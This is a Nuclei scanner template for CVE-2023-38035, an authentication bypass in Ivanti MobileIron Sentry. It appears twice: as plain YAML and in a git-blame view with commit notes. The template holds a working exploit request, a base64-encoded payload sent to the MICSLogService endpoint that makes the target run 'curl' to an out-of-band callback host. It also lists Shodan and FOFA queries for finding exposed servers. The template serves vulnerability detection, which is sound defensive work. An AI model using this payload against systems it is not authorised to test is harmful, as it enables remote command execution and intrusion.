nuclei-templates/http/cves/2023/CVE-2023-38035.yaml

id: CVE-2023-38035

info:
  name: Ivanti Sentry - Authentication Bypass
  author: DhiyaneshDk,iamnoooob,rootxharsh
  severity: critical
  description: |
    A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the system.
  remediation: |
    Apply the latest security patches or updates provided by Ivanti to fix the authentication bypass vulnerability.
  reference:
    - https://forums.ivanti.com/s/article/CVE-2023-38035-API-Authentication-Bypass-on-Sentry-Administrator-Interface
    - https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/
    - https://github.com/horizon3ai/CVE-2023-38035
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38035
    - http://packetstormsecurity.com/files/174643/Ivanti-Sentry-Authentication-Bypass-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-38035
    cwe-id: CWE-863
    epss-score: 0.97506
    epss-percentile: 0.99983
    cpe: cpe:2.3:a:ivanti:mobileiron_sentry:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ivanti
    product: mobileiron_sentry
    shodan-query: 'html:"Note: Requires a local Sentry administrative user"'
    fofa-query: 'body="note: requires a local sentry administrative user"'
  tags: cve2023,cve,packetstorm,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast
variables:
  oast: "{{interactsh-url}}/?"
  padstr: "{{randstr}}"

http:
  - raw:
      - |
        POST /mics/services/MICSLogService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {{base64_decode('YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=')}}curl {{padding(oast,padstr,71)}}{{base64_decode('UwAGaXNSb290VHpOeg==')}}

    matchers:
      - type: dsl
        dsl:
          - contains(body, 'isRunningTzz')
          - contains(interactsh_protocol, 'dns')
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100e0d7db72cf2d3250b9cec6f4809158d7a36e2c52763f0d5bb3d4063ed878f6820220298d902c4967c3ff8d30ccca8aded010c4b182fd6d9af361525c23d6730e4bb3:922c64590222798bb761d5b6d8e72950
Create CVE-2023-38035.yaml (#8075) * Create CVE-2023-38035.yaml * syntax fix * working template * misc updates --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-08-24 17:40:37 +00:00			`id: CVE-2023-38035`

			`info:`
			`name: Ivanti Sentry - Authentication Bypass`
			`author: DhiyaneshDk,iamnoooob,rootxharsh`
			`severity: critical`
			`description: \|`
			`A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the system.`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`remediation: \|`
			`Apply the latest security patches or updates provided by Ivanti to fix the authentication bypass vulnerability.`
Create CVE-2023-38035.yaml (#8075) * Create CVE-2023-38035.yaml * syntax fix * working template * misc updates --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-08-24 17:40:37 +00:00			`reference:`
			`- https://forums.ivanti.com/s/article/CVE-2023-38035-API-Authentication-Bypass-on-Sentry-Administrator-Interface`
			`- https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/`
			`- https://github.com/horizon3ai/CVE-2023-38035`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-38035`
templateman update 2023-10-14 11:27:55 +00:00			`- http://packetstormsecurity.com/files/174643/Ivanti-Sentry-Authentication-Bypass-Remote-Code-Execution.html`
Create CVE-2023-38035.yaml (#8075) * Create CVE-2023-38035.yaml * syntax fix * working template * misc updates --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-08-24 17:40:37 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2023-38035`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cwe-id: CWE-863`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.97506`
			`epss-percentile: 0.99983`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`cpe: cpe:2.3:a:ivanti:mobileiron_sentry::::::::`
Create CVE-2023-38035.yaml (#8075) * Create CVE-2023-38035.yaml * syntax fix * working template * misc updates --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-08-24 17:40:37 +00:00			`metadata:`
			`verified: true`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`max-request: 1`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`vendor: ivanti`
			`product: mobileiron_sentry`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`shodan-query: 'html:"Note: Requires a local Sentry administrative user"'`
product/queries updated 2024-05-31 19:23:20 +00:00			`fofa-query: 'body="note: requires a local sentry administrative user"'`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2023,cve,packetstorm,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast`
Create CVE-2023-38035.yaml (#8075) * Create CVE-2023-38035.yaml * syntax fix * working template * misc updates --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-08-24 17:40:37 +00:00			`variables:`
			`oast: "{{interactsh-url}}/?"`
			`padstr: "{{randstr}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST /mics/services/MICSLogService HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`

			`{{base64_decode('YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=')}}curl {{padding(oast,padstr,71)}}{{base64_decode('UwAGaXNSb290VHpOeg==')}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- contains(body, 'isRunningTzz')`
			`- contains(interactsh_protocol, 'dns')`
			`- status_code == 200`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`condition: and`
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot: 2024-06-01 06:53:00 +00:00			`# digest: 4a0a00473045022100e0d7db72cf2d3250b9cec6f4809158d7a36e2c52763f0d5bb3d4063ed878f6820220298d902c4967c3ff8d30ccca8aded010c4b182fd6d9af361525c23d6730e4bb3:922c64590222798bb761d5b6d8e72950`